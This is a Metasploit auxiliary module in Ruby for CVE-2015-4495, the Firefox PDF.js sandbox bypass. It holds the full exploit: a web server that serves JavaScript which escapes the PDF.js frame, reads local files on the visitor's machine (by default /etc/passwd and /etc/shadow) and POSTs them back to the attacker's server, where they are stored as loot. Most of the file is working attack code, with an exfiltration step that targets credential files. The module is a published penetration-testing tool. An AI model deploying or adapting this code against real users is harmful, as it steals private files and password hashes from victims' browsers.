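##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2015-4495 (Firefox PDF.js privileged-frame bypass).
#
# The module runs an HTTP server (HttpServer::HTML mixin). A GET on the module
# resource returns an HTML page whose script, on an affected Firefox, reads each
# path listed in FILES through the PDF.js viewer frame and POSTs the content
# back to "<resource>/catch". Every POST is stored as loot via
# Msf::Auxiliary::Report.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  # Module metadata and options.
  #
  # FILES          - comma-separated list of absolute paths to read on the client.
  # PER_FILE_SLEEP - (advanced) delay in milliseconds before the frame holding a
  #                  file is read; the next file is scheduled PER_FILE_SLEEP+200 ms later.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox PDF.js Browser File Theft',
        'Description' => %q{
          This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
          38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
          occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
          privileges to read local files. The in-the-wild malicious payloads searched for sensitive
          files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
          do not use the Mozilla PDF viewer.
        },
        'Author' => [
          'Unknown', # From an 0day served on Russian news website
          'fukusa', # Hacker news member that reported the issue
          'Unknown' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
        'PassiveActions' => [ 'WebServer' ],
        'References' => [
          ['URL', 'https://paste.debian.net/290146'], # 0day exploit
          ['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer
          ['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'],
          ['CVE', '2015-4495']
        ],
        'DefaultAction' => 'WebServer',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([
      OptString.new('FILES', [
        false,
        'Comma-separated list of files to steal',
        '/etc/passwd, /etc/shadow'
      ])
    ])

    register_advanced_options([
      OptInt.new('PER_FILE_SLEEP', [
        false,
        'Milliseconds to wait before attempting to read the frame containing each file',
        250
      ])
    ])
  end

  # Entry point: log the configured target list, then hand over to the
  # HttpServer mixin's `exploit`, which dispatches requests to #on_request_uri.
  def run
    print_status("File targeted for exfiltration: #{JSON.generate(file_urls)}")
    exploit
  end

  # HTTP request handler. A POST carries one file read by the client-side
  # script (see #file_payload) and is stored as loot with an empty 200 reply;
  # any other method receives the exploit page.
  #
  # @param cli     connected client (only #peerhost is used here)
  # @param request parsed HTTP request
  def on_request_uri(cli, request)
    if request.method.downcase == 'post'
      print_status('Got POST request...')
      process_post(cli, request)
      send_response_html(cli, '')
    else
      print_status('Sending exploit...')
      send_response_html(cli, html)
    end
  end

  # Store the body of one POST as loot.
  #
  # `name` comes from the request query string. It is normally set by the
  # client-side script, but anyone who can reach the server can supply it, so
  # this relies on store_loot to sanitise the value before it is used as part
  # of a filename (NOTE(review): confirm store_loot does so).
  # A missing body is stored as an empty string instead of raising.
  #
  # @param cli connected client; its peer address is recorded with the loot
  # @param req parsed HTTP request whose body is the exfiltrated file
  def process_post(cli, req)
    name = req.qstring['name']
    body = req.body.to_s
    # bytesize avoids materialising a byte array just to count it
    print_good("Received #{name}, size #{body.bytesize}...")
    output = store_loot(
      name || 'data', 'text/plain', cli.peerhost, body, 'firefox_theft', 'Firefox PDF.js exfiltrated file'
    )
    print_good("Stored to #{output}")
  end

  # Complete exploit page. #js ends inside an open `setInterval(function() {...`
  # so that #file_payload runs once the sandbox context exists; the trailing
  # `}, 20);` closes that call with a 20 ms interval.
  #
  # @return [String] HTML document containing the assembled script
  def html
    exploit_js = js + file_payload + '}, 20);'

    "<!doctype html><html><body><script>#{exploit_js}</script></body></html>"
  end

  # Absolute URL the client-side script POSTs stolen files to.
  #
  # A wildcard SRVHOST of 0.0.0.0 is replaced by this host's source address so
  # the victim browser has a routable target; port 80 is omitted from the URL
  # and a trailing slash on the resource is dropped before "/catch" is appended.
  #
  # @return [String] e.g. "http://<host>[:port]/<resource>/catch"
  def backend_url
    proto = datastore['SSL'] ? 'https' : 'http'
    my_host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    port_str = datastore['SRVPORT'].to_i == 80 ? '' : ":#{datastore['SRVPORT']}"
    resource = get_resource.chomp('/')

    "#{proto}://#{my_host}#{port_str}#{resource}/catch"
  end

  # Per-run part of the client-side script: embeds the FILES list, the
  # PER_FILE_SLEEP delay and #backend_url, and walks the list one file at a
  # time, POSTing each result with the file path in the `name` query parameter.
  #
  # @return [String] JavaScript fragment appended to #js
  def file_payload
    %Q|
    var files = (#{JSON.generate(file_urls)});
    function next() {
      var f = files.pop();
      if (f) {
        get("file://"+f, function() {
          var data = get_data(this);
          var x = new XMLHttpRequest;
          x.open("POST", "#{backend_url}?name="+encodeURIComponent("%URL%"));
          x.send(data);
        }, #{datastore['PER_FILE_SLEEP']}, "%URL%", f);
        setTimeout(next, #{datastore['PER_FILE_SLEEP']}+200);
      }
    }
    next();
    |
  end

  # Parse the FILES option into a list of paths.
  #
  # Tolerates an unset/blank option and stray separators: entries are trimmed
  # and empty ones dropped, so "a, b," yields ["a", "b"] rather than an empty
  # path that the script would request as "file://".
  #
  # @return [Array<String>]
  def file_urls
    datastore['FILES'].to_s.split(',').map(&:strip).reject(&:empty?)
  end

  # Static part of the client-side script, served verbatim (see the module
  # references for the origin of this payload). It intentionally ends inside an
  # open `setInterval` callback; #html appends #file_payload and the closing
  # `}, 20);`.
  #
  # @return [String] JavaScript prefix of the exploit page
  def js
    <<~EOJS
      function xml2string(obj) {
        return new XMLSerializer().serializeToString(obj);
      }

      function __proto(obj) {
        return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
      }

      function get(path, callback, timeout, template, value) {
        callback = _(callback);
        if (template && value) {
          callback = callback.replace(template, value);
        }
        js_call1 = 'javascript:' + _(function() {
          try {
            open("%url%", "_self");
          } catch (e) {
            history.back();
          }
          undefined;
        }, "%url%", path);
        js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
        sandboxContext(_(function() {
          i = document.getElementById('i');
          p = __proto(i.contentDocument.styleSheets[0].ownerNode);
          i2 = document.getElementById('i2');
          l = p.__lookupSetter__.call(i2.contentWindow, 'location');
          l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
        }));
        setTimeout((function() {
          sandboxContext(_(function() {
            p = __proto(i.contentDocument.styleSheets[0].ownerNode);
            l = p.__lookupSetter__.call(i2.contentWindow, 'location');
            l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
          }));
        }), timeout);
      }

      function get_data(obj) {
        data = null;
        try {
          data = obj.document.documentElement.innerHTML;
          if (data.indexOf('dirListing') < 0) {
            throw new Error();
          }
        } catch (e) {
          if (this.document instanceof XMLDocument) {
            data = xml2string(this.document);
          } else {
            try {
              if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
                data = this.document.body.firstChild.textContent;
              } else {
                throw new Error();
              }
            } catch (e) {
              try {
                if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
                  return null;
                } else {
                  throw new Error();
                }
              } catch (e) {
                ;;
              }
            }
          }
        }
        return data;
      }

      function _(s, template, value) {
        s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
        s = s.substring(0, s.length - 1);
        if (template && value) {
          s = s.replace(template, value);
        }
        s += __proto;
        s += xml2string;
        s += get_data;
        s = s.replace(/\\s\\/\\/.*\\n/g, "");
        s = s + ";undefined";
        return s;
      }

      function get_sandbox_context() {
        if (window.my_win_id == null) {
          for (var i = 0; i < 20; i++) {
            try {
              if (window[i].location.toString().indexOf("view-source:") != -1) {
                my_win_id = i;
                break;
              }
            } catch (e) {}
          }
        };
        if (window.my_win_id == null)
          return;
        clearInterval(sandbox_context_i);
        object.data = 'view-source:' + blobURL;
        window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
        object.data = 'data:text/html,<'+'html/>';
        window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
          '"position:absolute; left:-9999px;" onload = "'+_(function(){
            window.wrappedJSObject.sandboxContext=(function(cmd) {
              with(importFunction.constructor('return this')()) {
                return eval(cmd);
              }
            });
          }) + '"/>');
      }


      var i = document.createElement("iframe");
      i.id = "i";
      i.width=i.height=0;
      i.style='position:absolute;left:-9999px;';
      i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
      document.documentElement.appendChild(i);
      i.onload = function() {
        if (this.contentDocument.styleSheets.length > 0) {
          var i2 = document.createElement("iframe");
          i2.id = "i2";
          i2.width=i2.height=0;
          i2.style='position:absolute;left:-9999px;';
          i2.src = "data:application/pdf,";
          document.documentElement.appendChild(i2);
          pdfBlob = new Blob([''], {
            type: 'application/pdf'
          });
          blobURL = URL.createObjectURL(pdfBlob);
          object = document.createElement('object');
          object.data = 'data:application/pdf,';
          object.onload = (function() {
            sandbox_context_i = setInterval(get_sandbox_context, 200);
            object.onload = null;
            object.data = 'view-source:' + location.href;
            return;
          });
          document.documentElement.appendChild(object);
        } else {
          this.contentWindow.location.reload();
        }
      }

      var kill = setInterval(function() {
        if (window.sandboxContext) {
          clearInterval(kill);
        } else {
          return;
        }
    EOJS
  end
end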